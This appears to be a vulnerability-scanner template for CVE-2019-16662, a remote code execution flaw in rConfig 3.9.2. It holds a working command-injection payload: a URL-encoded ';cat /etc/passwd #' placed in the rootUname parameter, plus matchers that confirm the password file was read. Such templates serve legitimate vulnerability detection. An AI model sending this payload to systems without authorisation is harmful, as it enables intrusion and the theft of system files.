id: CVE-2019-16662 info: name: rConfig 3.9.2 - Remote Code Execution author: pikpikcu severity: critical reference: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ tags: cve,cve2019,rce,intrusive requests: - method: GET path: - "{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:"